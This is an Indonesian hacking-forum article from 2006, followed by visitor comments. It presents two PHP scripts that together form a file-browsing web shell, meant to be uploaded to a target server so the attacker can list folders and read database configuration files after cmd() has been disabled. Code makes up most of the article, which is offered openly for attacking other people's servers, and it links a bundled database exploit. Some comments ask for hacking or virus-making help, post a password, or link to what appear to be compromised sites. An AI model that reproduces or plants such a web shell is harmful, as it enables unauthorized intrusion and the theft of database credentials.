Home
Hacking
Tutorial
.NET
IT News
Lain-lain
About Us
FAQ
Penerbitan Buku

Klik untuk join milist Jasakom




 

Jasakom Community - Article
Browsing Folder server tanpa fungsi cmd()
Date: Thursday, April 27, 2006    Hits: 4156    By:  anstellwinkel   
Setelah cukup lama (maklum newbies) mencari ide bagaimana mengakali server yang mematikan fungsi cmd()
New Page 1

....untuk melihat isi dari folder dan membaca isi file-nya, karena hal ini penting untuk mendapatkan konfigurasi database dari target (digunakan pada script expolit database via PHP script) maka saya membuat script sederhana (hanya untuk membaca folder dan isi dari file) dengan PHP ...saking sederhananya mungkin rekan-rekan lainnya sudah tahu (saya aja yang telat nih kayanya)


OK ... langsung saja ... script ini terdiri dari 2 buah file php

1. bukadir.php
2. baca.php

isi script

bukadir.php
<html>
<head>
<title>:..: Membaca Isi Folder by anstellwinkel :..:</title>
</head>
<body bgcolor="#666666">
<?php
if(!$Submit) {
echo "<center>DOCUMENT ROOT : $DOCUMENT_ROOT";
?>
<form name="hackdir" method="post" action="">
<table width="500">
<tr bgcolor="#000000">
<td width="112">Masukkan Path : </td>
<td width="300"><input name="dir" type="text" id="dir" size="50"></td>
</tr>
</table>
<input type="submit" name="Submit" value="Submit">
</form>
<a href="admindb.php">halaman muka</a>
<?php
}
else {
echo "<center>
path $dir.<p>";
$path = $dir;
$dir = opendir("$dir");
?>
<textarea cols="40" rows="25">
<?php
while ($baca = readdir($dir))
print("$baca \n");
closedir($dir);
?>
</textarea><br>
<br>Melihat Isi File
<form name="hackdir" method="post" action="baca.php">
<table width="475">
<tr bgcolor="#000000">
<td width="130">Masukkan nama file : </td>
<td width="320">
<input name="path" type="text" id="path" size="50" value="<? echo $path ?>"></td>
</tr>
</table>
<input type="submit" name="Submit" value="Submit">
</form>
<a href="admindb.php">halaman muka</a>
<?php
}
?>
</body>
</html>


pada script ini kita memasukkan path dari target berdasarkan document root-nya

contoh :

DOCUMENT ROOT : ../../public_html/

Masukkan Path : /home/target_folder/public_html/

isi script

baca.php
<html>
<head>
<title>:..: Membaca Isi File by anstellwinkel :..:</title>
</head>
<body bgcolor="#666666">
<?php
if($Submit) {
$nama_file = "$path";
$isi_file = file($nama_file);
$jml_baris = sizeof($isi_file);
echo "<center>File $nama_file berisi $jml_baris baris.<p>";
?>
<textarea cols="80" rows="25">
<?php
for ($i=0; $i<$jml_baris; $i++)
{
print "$isi_file[$i]";
}
?>
</textarea></center>
<?php
}
?>
<a href="bukadir.php">kembali</a>

pada script ini masukkan nama file yang akan dilihat isinya

contoh :

Masukkan nama file : /home/target_folder/public_html/configdb.php
dan sebagai catatan script ini harus diupload keserver target....caranya terserah anda!!!!

fungsi dari script ini untuk mendapatkan file konfigurasi database target

Ok!!!...sepertinya hanya ini aja ... untuk download script lengkapnya saya gabungkan dengan
script saya yang pertama (expolit database via php script) di http://www.geocities.com/anstellwinkel/request.rar

 

Cya...by anstellwinkel at
anstellwinkel(@)yahoo.com.au

Source: JASAKOM Information Center
 
1 2 3
Jasakom Community - Visitor Comment
Nama: Whandy@yahoo.com   Tgl: 5/17/2006 9:43:06 AM
Komentar:
Minum kopi pake Gula?
Nama: ronin_g2n   Tgl: 5/16/2006 11:25:33 PM
Komentar:
url: http://www.geocities.com/anstellwinkel/script/request.zip
Nama: J4mbi_H4ck3r   Tgl: 5/4/2006 2:18:52 PM
Komentar:
http://img419.imageshack.us/img419/1900/jambihackerlink5go.jpg
Nama: bakwan   Tgl: 5/3/2006 2:53:33 AM
Komentar:
emm...kalau bakwan digoreng trus,,itu kan ada.cracker2nya tuh enak..gurih..
Nama: bakwan   Tgl: 5/3/2006 2:53:21 AM
Komentar:
emm...kalau bakwan dogoreng trus,,itu kan ada.cracker2nya tuh enak..gurih..
Nama: techno46   Tgl: 5/1/2006 10:24:59 PM
Komentar:
i'll trying, ;-)
Nama: masihsakit   Tgl: 5/1/2006 6:42:55 PM
Komentar:
yang punya data about hacking/cracking atau program n cara tuk buat virus kasi tau ane( coz ane masih cupu ) ke : lagi_sakit_gigi@ yahoo.com OK!
Nama: 55555   Tgl: 5/1/2006 1:10:26 PM
Komentar:
bagi abang-abang yang punya ilmu hacker turunin ilmu nya dong ke gw. ke no 085643233313
Nama: 55555   Tgl: 5/1/2006 1:10:24 PM
Komentar:
bagi abang-abang yang punya ilmu hacker turunin ilmu nya dong ke gw. ke no 085643233313
Nama: mawar selatan   Tgl: 5/1/2006 3:36:31 AM
Komentar:
Buat yg sudah jadi master hacker, tolongin saya membobol answearing machin indosat buat pulsaku 10jtokey.Di 08566332261
Nama: ph0ux_4j035   Tgl: 4/30/2006 11:40:04 PM
Komentar:
http://www.a1grand-prix.de/files/
Nama: dr.pluto   Tgl: 4/30/2006 10:45:35 PM
Komentar:
aduuuh,...perutku kok sakit yach ?
Nama: asPi   Tgl: 4/30/2006 12:46:02 PM
Komentar:
capek ah.. btw normilasari siapa tuh pi hehehehe?
Nama: Dr`Ponidi   Tgl: 4/30/2006 12:44:24 PM
Komentar:
ini juga lah.. pass: cintague, om jasakom ada option buat ganti password nggak?
Nama: cwall   Tgl: 4/30/2006 12:41:15 PM
Komentar:
ini juga deh.. abis passwordnya masa bajinguk :)
Nama: #antihackerlink   Tgl: 4/30/2006 12:35:13 PM
Komentar:
ini juga :)
Nama: #640-607   Tgl: 4/30/2006 12:33:22 PM
Komentar:
hi user ini delate aja
Nama: ph0ux_4j035   Tgl: 4/29/2006 6:39:22 PM
Komentar:
http://www.board-city.net/dim/cache/
Nama: J4mbi_H4ck3r   Tgl: 4/29/2006 9:33:26 AM
Komentar:
http://img70.imageshack.us/img70/7987/jambihackerlink44qo.jpg http://img299.imageshack.us/img299/6141/jambihackerlink50uh.jpg
Nama: J4mbi_H4ck3r   Tgl: 4/29/2006 9:28:14 AM
Komentar:
http://img223.imageshack.us/img223/4890/jambihackerlink32wy.jpg
1 2 3

 

© Copyright by Jasakom 2005 All Right Reserved

User Id: *

Password:
* Required Field
User Baru ? Klik di sini
Lupa Password ?
Keyword :
 

Click here to join jasakomdotnet
Klik di sini untuk Join jasakomdotnet




Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.